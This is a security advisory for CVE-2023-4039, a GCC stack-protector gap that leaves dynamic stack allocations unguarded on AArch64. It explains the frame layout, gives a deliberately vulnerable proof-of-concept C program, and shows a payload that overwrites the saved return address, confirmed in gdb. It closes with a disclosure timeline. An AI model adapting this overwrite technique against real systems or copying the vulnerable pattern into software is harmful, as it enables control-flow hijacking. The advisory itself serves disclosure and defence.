Headline
CVE-2023-4039: GCC's -fstack-protector fails to guard dynamic stack allocations on ARM64
A failure in the -fstack-protector feature in GCC-based toolchains that target AArch64 allows an attacker to exploit an existing buffer overflow in dynamically-sized local variables in your application without this being detected. This stack-protector failure only applies to C99-style dynamically-sized local variables or those created using alloca(). The stack-protector operates as intended for statically-sized local variables.
The default behavior when the stack-protector detects an overflow is to terminate your application, resulting in controlled loss of availability. An attacker who can exploit a buffer overflow without triggering the stack-protector might be able to change program flow control to cause an uncontrolled loss of availability or to go further and affect confidentiality or integrity.
Vulnerability Description
On AArch64 targets, GCC’s stack smashing protection does not detect or defend against overflows of dynamically-sized local variables. In C, dynamically-sized variables include both variable-length arrays and buffers allocated using alloca(). GCC’s AArch64 stack frames place such variables immediately below saved register values like the return address with no intervening stack guard. All versions of GCC that we tested, from 5.4.0 to trunk as of 2023-05-15, are affected.
This happens on AArch64 but not on other GCC targets because GCC’s AArch64 backend lays out stack frames unconventionally: instead of saving the return address at the top of a frame (i.e. at the highest address, pushed before anything else) like most other backends and compilers, it saves it near the bottom of the frame, below the local variables. This comment from GCC’s source documents the frame layout:
/* AArch64 stack frames generated by this compiler look like:

        +-------------------------------+
        |                               |
        |  incoming stack arguments     |
        |                               |
        +-------------------------------+
        |                               | <-- incoming stack pointer (aligned)
        |  callee-allocated save area   |
        |  for register varargs         |
        |                               |
        +-------------------------------+
        |  local variables              | <-- frame_pointer_rtx
        |                               |
        +-------------------------------+
        |  padding                      | \
        +-------------------------------+  |
        |  callee-saved registers       |  | frame.saved_regs_size
        +-------------------------------+  |
        |  LR'                          |  |
        +-------------------------------+  |
        |  FP'                          |  |
        +-------------------------------+  |<- hard_frame_pointer_rtx (aligned)
        |  SVE vector registers         |  | \
        +-------------------------------+  |  | below_hard_fp_saved_regs_size
        |  SVE predicate registers      | /  /
        +-------------------------------+
        |  dynamic allocation           |
        +-------------------------------+
        |  padding                      |
        +-------------------------------+
        |  outgoing stack arguments     | <-- arg_pointer
        |                               |
        +-------------------------------+
        |                               | <-- stack_pointer_rtx (aligned) */
LR’ is the return address, so named because it’s saved from the LR register, and is the target of nearly all stack smashing attacks. It may then seem like a feature, not a bug, to put it at a lower address than the locals: a contiguous overflow only lets an attacker write to memory past the vulnerable local, so this layout keeps the return address out of their reach! In practice though, the memory immediately past a function’s stack frame is almost always another stack frame (belonging to the calling function) with its own saved LR value that the attacker can manipulate to the same effect.
You may notice that the layout above makes no mention of a stack guard. That’s because GCC’s architecture-independent code treats the stack guard as a local, placing it at the very top of the local area without any input from the target backend. Implicit in that placement is an assumption that locals will always occupy one contiguous region with no saved registers interspersed. But that assumption doesn’t hold on AArch64: as shown in the diagram, dynamic allocations live near the bottom of the stack frame, below the saved registers, so no guard sits between them and the saved FP’ and LR’ values.
Dynamic allocations are just as susceptible to overflows as other locals. In fact, they’re arguably more susceptible because they’re almost always arrays, whereas fixed locals are often integers, pointers, or other types to which variable-length data is never written. GCC’s own heuristics for when to use a stack guard reflect this, with its man page saying this about -fstack-protector (emphasis ours):
Emit extra code to check for buffer overflows … by adding a guard variable to functions with vulnerable objects. This includes functions that call “alloca”, and functions with buffers larger than or equal to 8 bytes.
Proof of Concept
The following C program is vulnerable to a contiguous stack overflow attack even when compiled with -fstack-protector or -fstack-protector-all:
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

int main(int argc, char **argv) {
    if (argc != 2)
        return 1;

    // Variable-length array
    uint8_t input[atoi(argv[1])];

    size_t n = fread(input, 1, 4096, stdin);
    fwrite(input, 1, n, stdout);

    return 0;
}
We cross-compiled this program for AArch64 using Arm’s GCC 12.2.Rel1 prebuilt toolchain and then ran it under QEMU, with debugging enabled, on an x86_64 host:
$ aarch64-none-linux-gnu-gcc -fstack-protector-all -O3 -static -Wall -Wextra -pedantic -o example-dynamic example-dynamic.c
$ echo -n 'DDDDDDDDPPPPPPPPFFFFFFFFAAAAAAAA' | qemu-aarch64 -g 5555 example-dynamic 8
We ask the program to make a dynamic allocation of size 8, which GCC rounds up to 16. The exploit payload mirrors the stack layout, with the eight "D"s representing the non-overflowing data, the eight "P"s padding out the actual allocation, the eight "F"s overwriting the saved frame pointer, and the eight "A"s overwriting the saved return address.
Attaching a debugger and resuming the program results in an immediate crash with PC set to the address from our payload, showing we have full control over execution flow despite the stack guard:
$ gdb example-dynamic
GNU gdb (GDB) Fedora Linux 13.1-3.fc37
<snip>
(gdb) target remote :5555
Remote debugging using :5555
<snip>
(gdb) continue
Continuing.
Program received signal SIGBUS, Bus error.
0x0041414141414141 in ?? ()
(gdb) print/a $pc
$1 = 0x41414141414141
For comparison, the following program, which uses a fixed allocation of size 8 instead of a dynamic one, detects the overflow correctly (the "G"s in the payload overwrite the guard):
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

int main(void) {
    uint8_t input[8];

    size_t n = fread(input, 1, 4096, stdin);
    fwrite(input, 1, n, stdout);

    return 0;
}
$ aarch64-none-linux-gnu-gcc -fstack-protector-all -O3 -static -Wall -Wextra -pedantic -o example-static example-static.c
$ echo -n 'DDDDDDDDGGGGGGGG' | qemu-aarch64 example-static
*** stack smashing detected ***: terminated
Aborted (core dumped)
Timeline
- April 27th, 2023: During an Azeria Labs ARM exploitation training, we notice that one of the demo binaries has a misplaced stack canary and investigate the cause.
- May 31st, 2023: We disclose the issue privately to Arm, as GCC has no security contact and every maintainer of GCC’s AArch64 backend is Arm-affiliated.
- May 31st, 2023: Arm’s Product Security Incident Response Team acknowledges and triages the report.
- June 1st, 2023: Arm confirms that the report is valid and asks if we intend to issue a CVE or if they should. We respond that we prefer the latter.
- July 13th, 2023: We remind Arm that the 90-day disclosure window is nearly halfway past and ask for a progress update.
- August 1st, 2023: Arm indicates they have a fix ready and requests a call with RTX to discuss coordinated disclosure.
- August 3rd, 2023: Arm and RTX meet. Arm proposes notifying distros and hyperscale partners prior to public disclosure. RTX agrees to that plan.
- August 21st, 2023: Arm and RTX meet again to finalize the disclosure timeline. We agree to make all advisories and patches public on August 29th, 90 days after RTX’s initial report, unless any of Arm’s partners request an extension.
- August 23rd, 2023: One of Arm’s partners requests disclosure be postponed by a week, so we set the new date to September 5th.
- August 30th, 2023: Arm notifies us that a compiler partner found a weakness in the patched mitigation and that they’ll need to revise their patch. We agree to postpone disclosure by another week, to September 12th, to allow time for that.
- September 12th, 2023: RTX’s blog post, Arm’s security advisory, CVE-2023-4039, and patches on GCC’s mailing list all go live simultaneously.